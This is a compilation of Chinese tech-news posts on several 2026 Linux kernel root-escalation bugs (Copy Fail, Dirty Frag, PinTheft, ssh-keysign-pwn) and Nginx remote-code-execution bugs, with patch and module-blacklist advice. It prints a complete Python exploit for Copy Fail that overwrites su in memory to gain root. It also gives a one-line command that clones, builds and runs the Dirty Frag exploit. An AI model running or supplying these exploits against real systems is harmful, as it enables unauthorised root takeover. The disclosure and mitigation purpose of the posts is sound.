只需要10行代码，就能获得自2017年至今大多数 Linux 发行版本的 root 权限。史称 Copy Fail，漏洞编号 CVE-2026-31431

先看提权演示视频

演示代码

代码来自这里，请仅在自己的机器上测试该漏洞：

#!/usr/bin/env python3
import os as g,zlib,socket as s
def d(x):return bytes.fromhex(x)
def c(f,t,c):
 a=s.socket(38,5,0);a.bind(("aead","authencesn(hmac(sha256),cbc(aes))"));h=279;v=a.setsockopt;v(h,1,d('0800010000000010'+'0'*64));v(h,5,None,4);u,_=a.accept();o=t+4;i=d('00');u.sendmsg([b"A"*4+c],[(h,3,i*4),(h,2,b'\x10'+i*19),(h,4,b'\x08'+i*3),],32768);r,w=g.pipe();n=g.splice;n(f,w,o,offset_src=0);n(r,u.fileno(),o)
 try:u.recv(8+t)
 except:0
f=g.open("/usr/bin/su",0);i=0;e=zlib.decompress(d("78daab77f57163626464800126063b0610af82c101cc7760c0040e0c160c301d209a154d16999e07e5c1680601086578c0f0ff864c7e568f5e5b7e10f75b9675c44c7e56c3ff593611fcacfa499979fac5190c0c0c0032c310d3"))
while i<len(e):c(f,i,e[i:i+4]);i+=4
g.system("su")

Linux 里有一种比较底层的接口，叫 AF_ALG，用来给程序做加密/解密的。它的数据会直接在内核里传来传去，不走普通读写路径。

问题出在这里，内核在处理这条数据通道时，没有区分“只读”和“可写”。

比如这段代码，它把额外的数据写入了内存中的 /usr/bin/su 程序，相当于修改了内存中的 su 程序（该程序权限很高），所以执行 su 的时候，就拿到了 root 权限。

Copy Fail

有人专门为这件事制作了一个漏洞演示网站，就叫做 Copy Fail，复制失败。

它还同时演示了 Ubuntu 24.04、Amazon Linux 2023、RHEL 14.3、SUSE 16 几个不同系统中招的过程：

该漏洞的利用过程是这样的：

1. 打开 su（目标程序）
2. 解压一段隐藏代码（payload）
3. 利用内核漏洞
4. 把 payload 写进内存里的 su
5. 执行 su → 拿 root

谁受影响

Copy Fail 只需要一个非特权本地用户账户，不需要网络访问权限，不需要内核调试功能，也不需要预装底层程序。基本上所有主流发行版的默认配置都启用了内核加密 API (AF_ALG)，因此整个 2017 → 补丁发布窗口之前的操作系统，都…开箱即用。

注意，Linux 被广泛应用在各种设备中，包括电脑、服务器、云平台、路由器、NAS、物联网设备，甚至部分手机系统，因此影响范围非常广。

怎么办？

更新你的操作系统。

原文：https://www.appinn.com/copy-fail-cve-2026-31431/

相关阅读

• 群晖两连更：几乎没人用功能，Telnetd 爆出两个 9.8 分 CVE 漏洞
• Windows 记事本爆出 8.8 分漏洞，专门针对 markdown 格式｜CVE-2026-20841
• React 爆出满分 10.0 漏洞（CVE-2025-55182）上一次同等级漏洞还是 Log4Shell
• 在特朗普政府威胁要中断 CVE 资金之后，欧盟当日就上线了自己的漏洞数据库（EUVD）
• Molili：当贝推出中文版 OpenClaw，不看教程都能用[Windows/macOS]

[ 点击前往获取链接 ]

还记得前几天的漏洞么：Copy Fail：2017年至今的漏洞，一个脚本获得 Linux root 管理员权限｜CVE-2026-31431
没想到，又来了。

Dirty Frag

这次叫 Dirty Frag，暂时还未获得 CVE 编号。普通用户可以在大多数 Linux 机器上立即获得 root 访问权限，没有可用的补丁，也没有发出警告。

Dirty Frag 的机制与前几天的 Copy Fail 很像，影响了 2017 年以来的大多数 Linux 系统，包括：

• Ubuntu
• Debian 系
• Fedora
• RHEL / AlmaLinux
• Arch
• OpenSUSE
• CentOS Stream
• 甚至 WSL2

消息最早来自 Openwall（Linux 安全邮件列表）：

主题：脏片段（Dirty Frag）：通用 Linux 本地提权漏洞
您好，
这是一份关于“脏片段”（Dirty Frag）的报告，该漏洞为通用型本地权限提升（LPE）漏洞，允许在所有主流Linux发行版上获取root权限。

此漏洞的影响与之前的复制错误（Copy Fail）类似。

由于保密协议现已被打破，目前没有任何针对这些漏洞的补丁或CVE编号。在与linux-distros@…openwall.org维护者协商后，并根据维护者的要求，我现公开这份《脏片段》文档。

与先前的复制错误（Copy Fail）漏洞一样，“脏片段”同样能在所有主流发行版上实现即时root权限提升，它串联了两个独立的漏洞：

• https://git.kernel.org/pub/scm/linux/kernel/git/netdev/net.git/commit/?id=f4c50a4034e62ab75f1d5cdd191dd5f9c77fdff4
• https://lore.kernel.org/all/afKV2zGR6rrelPC7@v4bel/

由于负责任的披露时间表和保密状态已被破坏，目前所有发行版均无可用补丁。

测试漏洞

任何本地用户，只需要运行一段代码，就能直接获得机器的 root 权限。

它不依赖特定环境，什么都不需要，本质上就是一个内核逻辑错误，一行：

git clone https://github.com/V4bel/dirtyfrag.git && cd dirtyfrag && gcc -O0 -Wall -o exp exp.c -lutil && ./exp

临时解决方案

幸运的是，目前的历史解决方案：禁用 esp4、esp6 和 rxrpc 模块即可。

这些模块都和 IPSec 网络功能有关，普通服务器、NAS、开发机通常不会用到。

## 告诉 Linux 不再加载这些模块
printf 'install esp4 /bin/false
install esp6 /bin/false
install rxrpc /bin/false
' > /etc/modprobe.d/dirtyfrag.conf

## 卸载已经加载的模块
rmmod esp4 esp6 rxrpc

## 检查是否还在
lsmod | grep -E 'esp4|esp6|rxrpc'

技术原理

与 Copy Fail 类似，Dirty Frag 也利用了 Linux 的“零拷贝（zero-copy）”机制，把原本只读的 page cache 变成了可写目标。

不同的是，Copy Fail 出问题的是加密优化代码，而 Dirty Frag 出问题的是 IPSec 相关模块。

Linux 在 2017 年加入的一段网络相关代码里埋下了这个漏洞，并一路影响到了今天的大多数发行版。

Ubuntu 因为有 AppArmor 防护，单靠第一个漏洞还不够，所以研究人员又串联了另一个 RxRPC 漏洞，最终实现 root 提权。

措手不及

Dirty Frag 之所以让很多管理员来不及反应，是因为漏洞虽然早在 4 月 30 日就已经报告给 Linux 内核团队，但有第三方提前打破了保密披露流程。

官方没有说明具体原因，不过外界猜测，这可能意味着漏洞已经开始被实际利用，因此不得不提前公开。

原文：https://www.appinn.com/dirty-frag/

怎么说呢，麻了，记得更新系统。

……哦不对，现在还没补丁

[ 点击前往获取链接 ]

Nginx 是一款被广泛使用的 HTTP 服务器软件。2026 年 5 月 13 日官方披露常用模组 rewrite 存在安全漏洞。攻击者可通过构造特殊 HTTP 请求触发该漏洞，导致 Nginx 工作进程发生堆缓冲区溢出，进而造成进程崩溃或服务重启。@Appinn

在部分关闭了地址空间布局随机化（ASLR）的系统中，攻击者还有可能进一步执行任意代码。

漏洞代码 CVE-2026-42945 得分 8.1 分，属于较高。

发生了什么？

感谢 @Niceb 同学的提醒。

在 Nginx 的 ngx_http_rewrite_module 模组中，发现了一个存在多年的内存漏洞，攻击者可通过构造特殊 HTTP 请求，在 nginx 处理 rewrite 规则时触发堆缓冲区溢出，导致工作进程崩溃、服务重启。

• 漏洞位置：ngx_http_rewrite_module
• 类型：堆缓冲区溢出（heap buffer overflow）
• 影响：可能导致远程代码执行（RCE）
• 攻击条件：攻击者不需要登录，可以通过构造 HTTP 请求触发
• 触发条件：需要 nginx 配置中存在特定 rewrite / set / if 组合，并使用 $1、$2 这类 PCRE 捕获变量，同时 replacement 字符串里带 ?
• 受影响时间跨度：研究人员称漏洞代码可追溯到 2008 年，影响大量历史版本。

在部分安全保护较弱的系统上，甚至可能进一步执行任意代码。由于 WordPress 等大量网站都广泛使用 rewrite 规则，因此这次漏洞影响范围较大。

什么是安全保护较弱的系统？

在这里，关闭了 ASLR（地址空间布局随机化）的系统，就算比较弱鸡的了。可通过下面的命令检测：

cat /proc/sys/kernel/randomize_va_space

返回 2，那么意味着你开启了 ，该漏洞最多会导致 Nginx 崩溃、重启，绝大多数现代操作系统都会是 2。

rewrite 规则

你可以通过以下命令查看所有的 rewrite 规则：

grep -RInE 'rewrite|set |\$[0-9]|if \(' /etc/nginx

青小蛙把小众软件的 rewrite 规则发给了 AI，得到了这个内容：

而让 AI 修复该规则，AI 把规则直接改掉了 😭

如何解决

升级 nginx/1.30.1 即可。

原文：https://www.appinn.com/nginx-rewrite-rce-cve-2026-42945/

相关阅读

• 在 Nginx 上使用 Let’s Encrypt 加密(HTTPS)你的网站[简明教程]
• 群晖两连更：几乎没人用功能，Telnetd 爆出两个 9.8 分 CVE 漏洞
• 免费内网穿透工具；树莓派利用网云穿内网穿透实现建站与维护，无需服务器
• React 爆出满分 10.0 漏洞（CVE-2025-55182）上一次同等级漏洞还是 Log4Shell
• Windows 记事本爆出 8.8 分漏洞，专门针对 markdown 格式｜CVE-2026-20841

[ 点击前往获取链接 ]

这是今天（2026年5月21日）早上：

这是今天晚上：

也不知道说什么了，直接看吧。

Linux 第4漏洞：CVE-2026-46333（7.1分）

这是继 Copy Fail（4 月 29 日）、Dirty Frag（5 月 7 日）和 Fragnesia（5 月 13 日）之后，在短短三周内爆出注的第四个 Linux 内核安全问题。

• • Copy Fail：一行代码root：2017年至今的系统漏洞，全中
• • Dirty Frag：麻了：Linux 又爆 Dirty Frag 漏洞：Ubuntu、Debian、Arch、RHEL、WSL2 全中招
• • Fragnesia：又来！14天内第三次 Linux 提权漏洞：一行代码，获得 root 权限｜CVE-2026-46300

现在，是第四次了。

ssh-keysign-pwn

github.com/0xdeadbeefnetwork/ssh-keysign-pwn

这个漏洞可以让 Linux 普通用户，获得 root 用户的任何文件，比如 root 的私钥。

大致流程：

ssh-keysign 开始退出
↓
进程权限还没完全清理
↓
fd 还活着
↓
mm 已经释放
↓
ptrace 权限检查异常
↓
攻击进程调用 pidfd_getfd()
↓
成功复制 root fd

攻击者能在进程“快死但没死透”的瞬间，把 root fd 偷出来，获取了权限。

而获取了 root 私钥，就完全掌握了服务器管理权。

如何解决？

内核已经更新，目前多个发行版本已经更新内核：

• • Ubuntu
• • Debian
• • Fedora
• • Arch Linux
• • AlmaLinux

直接升级到最新即可解决。

Linux 第 5 漏洞：PinTheft（CVE-2026-43494）

引自 w568w 同学的帖子：https://meta.appinn.net/t/topic/85794/

很新的漏洞，还没有评级。

V12 Security，一家自称「AI 智能代码审计」的公司，于 5 月 19 日晚披露了新的 Linux 内核安全漏洞。

原理：Linux RDS（可靠数据报 Socket）模块存在 double-free，导致攻击者可以利用 io_uring 模块去覆写具有 suid 的 Page cache，从而实现本地提权。

描述和一键复现 PoC 页面。

影响范围：目前为止的所有启用了 RDS 模块的 Linux 内核（包括最新稳定版 7.0.9）。

修复版本：暂无。缓解措施如下：

echo 'install rds /bin/false' | sudo tee -a /etc/modprobe.d/cve-pintheft.conf 
echo 'install rds_tcp /bin/false' | sudo tee -a /etc/modprobe.d/cve-pintheft.conf 
sudo rmmod rds_tcp rds

Nginx 漏洞: nginx-poolslip

Nginx 存在远程代码执行漏洞,该漏洞尚未修复。

1.31.0 就是当前 Nginx 的最新版本啊，前几天刚刚修过的 （Nginx 爆高危漏洞：可能已经存在十几年｜CVE-2026-42945）。

大概攻击过程就是可以一个 py 脚本，拿到了服务器的 shell：

发现漏洞的 Nebula 说将在修复后的30天内发布技术分析。

啊，这，啥时候更新啊

原文：https://www.appinn.com/linux-nginx-security-chaos/

也不知道说点啥，麻了。

相关阅读

• 在 Nginx 上使用 Let’s Encrypt 加密(HTTPS)你的网站[简明教程]
• 免费内网穿透工具；树莓派利用网云穿内网穿透实现建站与维护，无需服务器
• Nginx rewrite 模块爆高危漏洞：可能已经存在十几年｜CVE-2026-42945
• 【教程】使用 Let’s Encrypt 签发免费的 IP 地址证书
• Lima – macOS 上的 Linux 虚拟机、Docker 容器，像 WSL2 一样

[ 点击前往获取链接 ]